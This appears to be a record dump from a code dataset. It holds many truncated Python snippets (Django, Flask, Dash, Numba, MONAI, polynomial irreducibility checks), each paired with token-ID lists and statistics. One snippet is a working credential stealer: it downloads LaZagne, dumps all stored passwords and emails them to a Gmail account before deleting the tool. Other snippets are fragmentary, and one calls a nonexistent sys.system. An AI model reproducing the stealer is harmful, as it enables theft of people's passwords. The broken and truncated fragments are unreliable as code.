self._create_node() class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ class UpdateExpressionAttributeValueParser(ExpressionParser):
[ 11748, 18931, 198, 6738, 450, 66, 1330, 12531, 24396, 198, 11748, 450, 66, 198, 11748, 2237, 198, 6738, 17268, 1330, 390, 4188, 198, 198, 6738, 285, 2069, 13, 67, 4989, 375, 65, 17, 13, 79, 945, 278, 13, 459, 62, 77, 4147, 1330, 3...
2.722071
734
# -*- coding: utf-8 -*- """The graphical part of a DFTB+ Optimization node""" import logging import tkinter as tk import tkinter.ttk as ttk import dftbplus_step logger = logging.getLogger(__name__)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 464, 27831, 636, 286, 257, 360, 9792, 33, 10, 30011, 1634, 10139, 37811, 198, 198, 11748, 18931, 198, 11748, 256, 74, 3849, 355, 256, 74, 198, 11748, 256, ...
2.636364
77
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Mdulo de configurao dos consoles """ from Crypto.PublicKey import RSA import socket import os import base64
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 201, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 37811, 44, 67, 43348, 390, 4566, 5330, 78, 23430, 22629, 201, 198, 201, 198, 37811, 201, 198, 201, 198,...
2.514706
68
""" Django settings for marion project. """ from pathlib import Path from tempfile import mkdtemp from configurations import Configuration, values BASE_DIR = Path(__file__).parent.resolve() DATA_DIR = Path("/data") # pylint: disable=no-init
[ 37811, 198, 35, 73, 14208, 6460, 329, 1667, 295, 1628, 13, 198, 37811, 198, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 20218, 7753, 1330, 33480, 67, 29510, 198, 198, 6738, 25412, 1330, 28373, 11, 3815, 198, 198, 33, 11159, 62, 347...
3.179487
78
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import grpc from skywalking.protocol.common.Common_pb2 import KeyStringValuePair from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub from skywalking import config from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \ LogDataReportService from skywalking.command import command_service from skywalking.loggings import logger from skywalking.profile import profile_task_execution_service
[ 2, 198, 2, 49962, 284, 262, 24843, 10442, 5693, 357, 1921, 37, 8, 739, 530, 393, 517, 198, 2, 18920, 5964, 11704, 13, 220, 4091, 262, 28536, 2393, 9387, 351, 198, 2, 428, 670, 329, 3224, 1321, 5115, 6634, 9238, 13, 198, 2, 383, ...
3.893764
433
# Generated by Django 3.0.3 on 2020-02-07 19:59 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 18, 319, 12131, 12, 2999, 12, 2998, 678, 25, 3270, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
import toml from flask import Flask from flask_sqlalchemy import SQLAlchemy app = Flask(__name__, instance_relative_config=True) app.config.from_file("config.toml", load=toml.load) db = SQLAlchemy(app) from space_trace import views, cli
[ 11748, 284, 4029, 198, 6738, 42903, 1330, 46947, 198, 6738, 42903, 62, 25410, 282, 26599, 1330, 16363, 2348, 26599, 628, 198, 1324, 796, 46947, 7, 834, 3672, 834, 11, 4554, 62, 43762, 62, 11250, 28, 17821, 8, 198, 1324, 13, 11250, 13,...
3.025
80
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import logging from enum import Enum from .NormalDist import NormalDist from .UniformDist import UniformDist
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 18931, 198, 6738, 33829, 1330, 2039, 388, 198, 6738, 764, 26447, 20344, 1330, 14435, 20344, 198, 6738, 764, ...
3.14
50
import os import sys filename = sys.argv[1] from_id = int(sys.argv[2]) to_id = int(sys.argv[2]) for i in range(from_id, to_id + 1): sys.system("mv {0}.in{1} {0}{1}.in".format(filename, i)) sys.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
[ 11748, 28686, 198, 11748, 25064, 198, 198, 34345, 796, 25064, 13, 853, 85, 58, 16, 60, 198, 6738, 62, 312, 796, 493, 7, 17597, 13, 853, 85, 58, 17, 12962, 198, 1462, 62, 312, 796, 493, 7, 17597, 13, 853, 85, 58, 17, 12962, 198, ...
2.114754
122
from django.urls import path from . import views urlpatterns = [ path('apply/', views.FillPassApplication, name='transit-pass-application-form'), path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'), path('view-application-list/', views.DisplayApplicationList, name='view-application-list'), path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'), path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'), path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'), ]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 198, 6738, 764, 1330, 5009, 628, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 10786, 39014, 14, 3256, 5009, 13, 33762, 14478, 23416, 11, 1438, 11639, 7645, 270, 12, 6603, 12, ...
3.390863
197
import dash from dash.dependencies import Input, Output import dash_html_components as html import dash_core_components as dcc app = dash.Dash(__name__) app.layout = html.Div([ dcc.Textarea( id='textarea-example', value='Textarea content initialized\nwith multiple lines of text', style={'width': '100%', 'height': 300}, ), html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'}) ]) if __name__ == '__main__': app.run_server(debug=True)
[ 11748, 14470, 198, 6738, 14470, 13, 45841, 3976, 1330, 23412, 11, 25235, 198, 11748, 14470, 62, 6494, 62, 5589, 3906, 355, 27711, 198, 11748, 14470, 62, 7295, 62, 5589, 3906, 355, 288, 535, 198, 198, 1324, 796, 14470, 13, 43041, 7, 83...
2.657754
187
import pytest from selenium.common.exceptions import WebDriverException from wrapped_driver import WrappedDriver def test_empty_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(WebDriverException): WrappedDriver(executable_path="", headless=True) def test_no_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(TypeError): WrappedDriver(headless=True)
[ 11748, 12972, 9288, 198, 6738, 384, 11925, 1505, 13, 11321, 13, 1069, 11755, 1330, 5313, 32103, 16922, 198, 198, 6738, 12908, 62, 26230, 1330, 27323, 1496, 32103, 628, 198, 4299, 1332, 62, 28920, 62, 28663, 276, 38291, 62, 6978, 33529, ...
3.043478
161
from rlp.sedes import ( CountableList, ) from eth.rlp.headers import ( BlockHeader, ) from eth.vm.forks.byzantium.blocks import ( ByzantiumBlock, ) from .transactions import ( PetersburgTransaction, )
[ 6738, 374, 34431, 13, 36622, 274, 1330, 357, 198, 220, 220, 220, 2764, 540, 8053, 11, 198, 8, 198, 6738, 4555, 13, 81, 34431, 13, 50145, 1330, 357, 198, 220, 220, 220, 9726, 39681, 11, 198, 8, 198, 6738, 4555, 13, 14761, 13, 1640,...
2.638554
83
# Copyright 2020 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import inspect import os import sys import time import unittest from monai.utils import PerfContext results: dict = dict() if __name__ == "__main__": loader = unittest.TestLoader() default_pattern = get_default_pattern(loader) # Parse input arguments args = parse_args(default_pattern) # If quick is desired, set environment variable if args.quick: os.environ["QUICKTEST"] = "True" # Get all test names (optionally from some path with some pattern) with PerfContext() as pc: tests = loader.discover(args.path, args.pattern) discovery_time = pc.total_time print(f"time to discover tests: {discovery_time}s") test_runner = unittest.runner.TextTestRunner( resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast ) # Use try catches to print the current results if encountering exception or keyboard interruption try: test_result = test_runner.run(tests) print_results(results, discovery_time, args.thresh, "tests finished") sys.exit(not test_result.wasSuccessful()) except KeyboardInterrupt: print_results(results, discovery_time, args.thresh, "tests cancelled") sys.exit(1) except Exception: print_results(results, discovery_time, args.thresh, "exception reached") raise
[ 2, 15069, 12131, 25000, 20185, 42727, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 921, 743, 7330,...
3.11859
624
""" transforms.py is for shape-preserving functions. """ import numpy as np
[ 37811, 201, 198, 7645, 23914, 13, 9078, 318, 329, 5485, 12, 18302, 14344, 5499, 13, 201, 198, 37811, 201, 198, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 201, 198 ]
2.709677
31
from __future__ import unicode_literals from django.db import models from django.utils.translation import ugettext as _
[ 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 26791, 13, 41519, 1330, 334, 1136, 5239, 355, 4808, 628 ]
3.588235
34
from abc import ABCMeta, abstractmethod from frontegg.helpers.frontegg_urls import frontegg_urls import typing import jwt import requests from frontegg.helpers.logger import logger from jwt import InvalidTokenError
[ 6738, 450, 66, 1330, 9738, 48526, 11, 12531, 24396, 198, 6738, 1216, 38599, 1130, 13, 16794, 364, 13, 69, 1313, 660, 1130, 62, 6371, 82, 1330, 1216, 38599, 1130, 62, 6371, 82, 198, 11748, 19720, 198, 11748, 474, 46569, 198, 11748, 700...
3.375
64
# coding: utf-8 # Copyright 2021 Splunk, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"): you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # [http://www.apache.org/licenses/LICENSE-2.0] # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. ############# This file is auto-generated. Do not edit! ############# """ SDC Service: Action Service With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions. OpenAPI spec version: v1beta2.12 (recommended default) Generated by: https://openapi-generator.tech """ from requests import Response from string import Template from typing import List, Dict from splunk_sdk.base_client import handle_response from splunk_sdk.base_service import BaseService from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel from splunk_sdk.action.v1beta2.gen_models import Action from splunk_sdk.action.v1beta2.gen_models import ActionMutable from splunk_sdk.action.v1beta2.gen_models import ActionResult from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey from splunk_sdk.action.v1beta2.gen_models import ServiceError from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 2, 15069, 220, 33448, 13341, 2954, 11, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 1, 2599, 345, 743, 198, 2, 407, 779, 428, ...
3.427126
494
from flask import Blueprint home_bp = Blueprint('home', __name__) from . import views # noqa
[ 6738, 42903, 1330, 39932, 628, 198, 11195, 62, 46583, 796, 39932, 10786, 11195, 3256, 11593, 3672, 834, 8, 198, 198, 6738, 764, 1330, 5009, 220, 1303, 645, 20402, 198 ]
3.344828
29
#!/usr/bin/env python3 import requests import subprocess import smtplib import re import os import tempfile temp_dir = tempfile.gettempdir() os.chdir(temp_dir) download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne result = subprocess.check_output("lazagne.exe all", shell=True) send_mail("youremail@gmail.com", "yourpassword", result) os.remove("lazagne.exe")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 11748, 7007, 198, 11748, 850, 14681, 198, 11748, 895, 83, 489, 571, 198, 11748, 302, 198, 11748, 28686, 198, 11748, 20218, 7753, 628, 628, 198, 29510, 62, 15908, 796, 20218, 7753, ...
2.744966
149
from SmartAPI.rdf.List import List
[ 6738, 10880, 17614, 13, 4372, 69, 13, 8053, 1330, 7343, 198 ]
3.181818
11
################################################################################################## # Copyright (c) 2012 Brett Dixon # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the # Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ################################################################################################## """ Gallery API :: GET / Lists the galleries currently visible by the current user POST / Creates a gallery object GET /id Gallery object if visible by the current user PUT /id Adds image or video objects to the gallery DELETE /id Removes image or video objects from the gallery GET /filter Returns a filtered list of image and video objects """ import time import functools import logging import requests from django.core.mail import mail_managers from django.http import JsonResponse from django.core.exceptions import ImproperlyConfigured, PermissionDenied from django.db.models import Q, Count from django.db import connection from django.db.utils import ProgrammingError from django.template.loader import render_to_string from django.views.decorators.http import require_POST from django.contrib.contenttypes.models import ContentType from django.contrib.auth.decorators import login_required from django.conf import settings import six import json try: from haystack.query import SearchQuerySet HAYSTACK = True except (ImportError, ImproperlyConfigured): HAYSTACK = False from frog.models import ( Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece, ) from frog.common import Result, getObjectsFromGuids, getClientIP LOGGER = logging.getLogger("frog") try: QUERY_MODELS = [ _ for _ in ContentType.objects.filter(app_label="frog") if issubclass(_.model_class(), Piece) ] except ProgrammingError: pass BATCH_LENGTH = 75 def index(request, obj_id=None): """Handles a request based on method and calls the appropriate function""" if request.method == "GET": return get(request, obj_id) elif request.method == "POST": return post(request) elif request.method == "PUT": return put(request, obj_id) elif request.method == "DELETE": return delete(request, obj_id) def _filter(request, object_, tags=None, more=False, orderby="created"): """Filters Piece objects from self based on filters, search, and range :param tags: List of tag IDs to filter :type tags: list :param more -- bool, Returns more of the same filtered set of images based on session range return list, Objects filtered """ res = Result() idDict = {} objDict = {} data = {} modelmap = {} # Get all IDs for each model for m in QUERY_MODELS: modelmap[m.model_class()] = m.model if object_: idDict[m.model] = m.model_class().objects.filter(gallery=object_) else: idDict[m.model] = m.model_class().objects.all() if idDict[m.model] is None: continue if tags: for bucket in tags: searchQuery = "" o = None for item in bucket: if item == 0: # filter by tagless idDict[m.model].annotate(num_tags=Count("tags")) if not o: o = Q() o |= Q(num_tags__lte=1) break elif isinstance(item, six.integer_types): # filter by tag if not o: o = Q() o |= Q(tags__id=item) else: # add to search string searchQuery += item + " " if not HAYSTACK: if not o: o = Q() # use a basic search o |= Q(title__icontains=item) if HAYSTACK and searchQuery != "": # once all tags have been filtered, filter by search searchIDs = search(searchQuery, m.model_class()) if searchIDs: if not o: o = Q() o |= Q(id__in=searchIDs) if o: # apply the filters idDict[m.model] = ( idDict[m.model] .annotate(num_tags=Count("tags")) .filter(o) ) else: idDict[m.model] = idDict[m.model].none() # Remove hidden items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(hidden=True) # Remove deleted items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(deleted=True) # Get all ids of filtered objects, this will be a very fast query idDict[m.model] = list( idDict[m.model] .order_by("-{}".format(orderby)) .values_list("id", flat=True) ) lastid = request.session.get("last_{}".format(m.model), 0) if not idDict[m.model]: continue if not more: lastid = idDict[m.model][0] try: index = idDict[m.model].index(lastid) except ValueError: index = 0 if more and lastid != 0: index += 1 idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH] # perform the main query to retrieve the objects we want objDict[m.model] = m.model_class().objects.filter( id__in=idDict[m.model] ) objDict[m.model] = ( objDict[m.model] .select_related("author") .prefetch_related("tags") .order_by("-{}".format(orderby)) ) objDict[m.model] = list(objDict[m.model]) # combine and sort all objects by date objects = _sortObjects(orderby, **objDict) objects = objects[:BATCH_LENGTH] # Find out last ids lastids = {} for obj in objects: lastids["last_{}".format(modelmap[obj.__class__])] = obj.id for key, value in lastids.items(): request.session[key] = value # serialize objects for i in objects: res.append(i.json()) data["count"] = len(objects) if settings.DEBUG: data["queries"] = connection.queries res.value = data return JsonResponse(res.asDict()) def _sortObjects(orderby="created", **kwargs): """Sorts lists of objects and combines them into a single list""" o = [] for m in kwargs.values(): for l in iter(m): o.append(l) o = list(set(o)) sortfunc = _sortByCreated if orderby == "created" else _sortByModified if six.PY2: o.sort(sortfunc) else: o.sort(key=functools.cmp_to_key(sortfunc)) return o def _sortByCreated(a, b): """Sort function for object by created date""" if a.created < b.created: return 1 elif a.created > b.created: return -1 else: return 0 def _sortByModified(a, b): """Sort function for object by modified date""" if a.modified < b.modified: return 1 elif a.modified > b.modified: return -1 else: return 0 def search(query, model): """ Performs a search query and returns the object ids """ query = query.strip() LOGGER.debug(query) sqs = SearchQuerySet() results = sqs.raw_search("{}*".format(query)).models(model) if not results: results = sqs.raw_search("*{}".format(query)).models(model) if not results: results = sqs.raw_search("*{}*".format(query)).models(model) return [o.pk for o in results]
[ 29113, 29113, 29113, 2235, 198, 2, 15069, 357, 66, 8, 2321, 18726, 31178, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 286, 198, 2, 428, 3788, 290, 3917, 10314, 3696, 357, ...
2.28226
3,929
# uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: pirates.speedchat.PSpeedChatQuestMenu from otp.speedchat.SCMenu import SCMenu from otp.speedchat.SCTerminal import * from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal from pirates.quest.Quest import Quest from pirates.speedchat.PSpeedChatQuestTerminal import * from pirates.pirate.LocalPirate import * from pirates.quest.QuestStatus import * from pirates.quest.QuestDNA import *
[ 2, 34318, 2349, 21, 2196, 513, 13, 17, 13, 15, 198, 2, 11361, 18022, 8189, 362, 13, 19, 357, 38850, 5333, 8, 198, 2, 4280, 3361, 3902, 422, 25, 11361, 362, 13, 22, 13, 1415, 357, 85, 17, 13, 22, 13, 1415, 25, 23, 34825, 1129, ...
3.052632
190
# from redbot.core import Config from redbot.core import Config, commands, checks import asyncio import aiohttp import discord from discord import Webhook, AsyncWebhookAdapter import re
[ 2, 422, 2266, 13645, 13, 7295, 1330, 17056, 198, 6738, 2266, 13645, 13, 7295, 1330, 17056, 11, 9729, 11, 8794, 198, 11748, 30351, 952, 198, 11748, 257, 952, 4023, 198, 11748, 36446, 198, 6738, 36446, 1330, 5313, 25480, 11, 1081, 13361, ...
3.875
48
#The MIT License # #Copyright (c) 2020 DATA Lab at Texas A&M University #Copyright (c) 2016 OpenAI (https://openai.com) # #Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import hashlib import numpy as np import os import struct def colorize(string, color, bold=False, highlight = False): """Return string surrounded by appropriate terminal color codes to print colorized text. Valid colors: gray, red, green, yellow, blue, magenta, cyan, white, crimson """ attr = [] num = color2num[color] if highlight: num += 10 attr.append(str(num)) if bold: attr.append('1') attrs = ';'.join(attr) return '\x1b[%sm%s\x1b[0m' % (attrs, string) def hash_seed(seed=None, max_bytes=8): """Any given evaluation is likely to have many PRNG's active at once. (Most commonly, because the environment is running in multiple processes.) There's literature indicating that having linear correlations between seeds of multiple PRNG's can correlate the outputs: http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/ http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be http://dl.acm.org/citation.cfm?id=1276928 Thus, for sanity we hash the seeds before using them. (This scheme is likely not crypto-strength, but it should be good enough to get rid of simple correlations.) Args: seed (Optional[int]): None seeds from an operating system specific randomness source. max_bytes: Maximum number of bytes to use in the hashed seed. """ if seed is None: seed = create_seed(max_bytes=max_bytes) hash = hashlib.sha512(str(seed).encode('utf8')).digest() return _bigint_from_bytes(hash[:max_bytes]) def create_seed(a=None, max_bytes=8): """Create a strong random seed. Otherwise, Python 2 would seed using the system time, which might be non-robust especially in the presence of concurrency. Args: a (Optional[int, str]): None seeds from an operating system specific randomness source. max_bytes: Maximum number of bytes to use in the seed. """ # Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py if a is None: a = _bigint_from_bytes(os.urandom(max_bytes)) elif isinstance(a, str): a = a.encode('utf8') a += hashlib.sha512(a).digest() a = _bigint_from_bytes(a[:max_bytes]) elif isinstance(a, int): a = a % 2**(8 * max_bytes) else: raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a)) return a # TODO: don't hardcode sizeof_int here
[ 2, 464, 17168, 13789, 198, 2, 198, 2, 15269, 357, 66, 8, 12131, 42865, 3498, 379, 3936, 317, 5, 44, 2059, 198, 2, 15269, 357, 66, 8, 1584, 4946, 20185, 357, 5450, 1378, 9654, 1872, 13, 785, 8, 198, 2, 198, 2, 5990, 3411, 318, ...
3.016653
1,201
import random import math from functools import partial import json import pysndfx import librosa import numpy as np import torch from ops.audio import ( read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout ) SAMPLE_RATE = 44100
[ 11748, 4738, 198, 11748, 10688, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 11748, 33918, 198, 198, 11748, 279, 893, 358, 21373, 198, 11748, 9195, 4951, 64, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28034, 198, 198, 6738, 39628, ...
2.831683
101
#!/usr/env/bin python import os # os.environ['OMP_NUM_THREADS'] = '1' from newpoisson import poisson import numpy as np from fenics import set_log_level, File, RectangleMesh, Point mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36) # comm = mesh.mpi_comm() set_log_level(40) # ERROR=40 # from mpi4py import MPI # comm = MPI.COMM_WORLD # rank = comm.Get_rank() if __name__=='__main__': import argparse parser = argparse.ArgumentParser(description="Poisson Problem") parser.add_argument('-n', '--num', default = 10, type=int, help="Number of samples") parser.add_argument('-o', '--outfile', default='results', help="Output filename (no extension)") parser.add_argument('-i', '--input-dim', default=1, type=int) parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)') args = parser.parse_args() num_samples = args.num dist = args.dist outfile = args.outfile.replace('.pkl','') inputdim = args.input_dim if inputdim == 1: # U[1,5] randsamples = 1 + 4*np.random.rand(num_samples) else: # N(0,1) if dist == 'n': randsamples = np.random.randn(num_samples, inputdim) elif dist == 'u': randsamples = -4*np.random.rand(num_samples, inputdim) else: raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)") sample_seed_list = list(zip(range(num_samples), randsamples)) results = [] for sample in sample_seed_list: r = wrapper(sample, outfile) results.append(r) # print(results) import pickle pickle.dump(results, open(f'{outfile}.pkl','wb'))
[ 2, 48443, 14629, 14, 24330, 14, 8800, 21015, 198, 11748, 28686, 198, 2, 28686, 13, 268, 2268, 17816, 2662, 47, 62, 41359, 62, 4221, 15675, 50, 20520, 796, 705, 16, 6, 198, 6738, 649, 7501, 30927, 1330, 745, 30927, 198, 11748, 299, 3...
2.316354
746
""" Irreduzibilittskriterien Implementiert wurden das Eisenstein- und das Perronkriterium Quellen: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf bergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten """ import logging import helper import itertools # rekursive Implementierung von HCF def hcf(x, y): """Highest common factor""" if y == 0: return x else: return hcf(y, x % y) def is_polynomial_coprime(polynomial): """berprft, ob ein Polynom teilerfremd (coprime) ist""" non_zero_polynomial = [ i for i in polynomial.coefficients if i != 0 ] # Nullen wrden Ergebnis von HCF verflschen if polynomial.degree() == 0: return True for x, y in itertools.combinations(non_zero_polynomial, 2): if hcf(x, y) != 1: return False return True # Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf def is_irreducible_perron(polynomial): """ Prft ein Polynom auf Irreduzierbarkeit (Perron). Fhrender Koeffizient != 1 funktioniert nicht. Keine Aussage mglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten """ if polynomial.degree() < 0: return logging.error("Polynom ungltig") const_coefficient = polynomial.coefficients[0] if const_coefficient == 0: return 0 lead_coefficient = polynomial.coefficients[polynomial.degree()] assert lead_coefficient == 1 nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1]) total = 1 i = 0 for coeff in polynomial.coefficients: if i < polynomial.degree() - 1: total += abs(coeff) i = i + 1 if nm1_coefficient > total: return 1 return 2 # Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf # http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf def is_irreducible_eisenstein(polynomial): """ Eine Implementierung des Eisensteinkriteriums. """ # Polynom muss einen Grad m >= 1 haben if polynomial.degree() < 1: return 2 # Voraussetzung fr Eisenstein sind teilerfremde Koeffizienten if helper.is_polynomial_coprime(polynomial is False): return 2 # Prfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen const_coeff = polynomial.coefficients[0] if const_coeff == 0: return 0 # Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten prime_factors = helper.prime_factor(const_coeff) for p in prime_factors: if ( const_coeff % pow(p, 2) != 0 ): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden return 2 for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]: if coeff % p != 0: return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden return 1
[ 37811, 198, 220, 220, 220, 5686, 445, 10277, 571, 346, 715, 8135, 43407, 2013, 198, 220, 220, 220, 48282, 72, 861, 266, 42568, 288, 292, 22633, 5714, 12, 3318, 288, 292, 2448, 1313, 74, 43407, 1505, 198, 220, 220, 220, 4670, 297, 26...
2.277536
1,380
# # Copyright (c) 2017 Intel Corporation # SPDX-License-Identifier: BSD-2-Clause # import copy import numpy as np from llvmlite import ir as lir from numba.core import types, typing, utils, ir, config, ir_utils, registry from numba.core.typing.templates import (CallableTemplate, signature, infer_global, AbstractTemplate) from numba.core.imputils import lower_builtin from numba.core.extending import register_jitable from numba.core.errors import NumbaValueError from numba.misc.special import literal_unroll import numba import operator from numba.np import numpy_support def slice_addition(the_slice, addend): """ Called by stencil in Python mode to add the loop index to a user-specified slice. """ return slice(the_slice.start + addend, the_slice.stop + addend)
[ 2, 198, 2, 15069, 357, 66, 8, 2177, 8180, 10501, 198, 2, 30628, 55, 12, 34156, 12, 33234, 7483, 25, 347, 10305, 12, 17, 12, 2601, 682, 198, 2, 198, 198, 11748, 4866, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 32660, 85, ...
2.817568
296
import numpy as np import pydrake.symbolic as ps import torch import time from irs_lqr.dynamical_system import DynamicalSystem
[ 11748, 299, 32152, 355, 45941, 198, 11748, 279, 5173, 33788, 13, 1837, 2022, 4160, 355, 26692, 198, 11748, 28034, 198, 11748, 640, 198, 198, 6738, 4173, 82, 62, 75, 80, 81, 13, 67, 4989, 605, 62, 10057, 1330, 14970, 605, 11964, 198 ]
3.047619
42
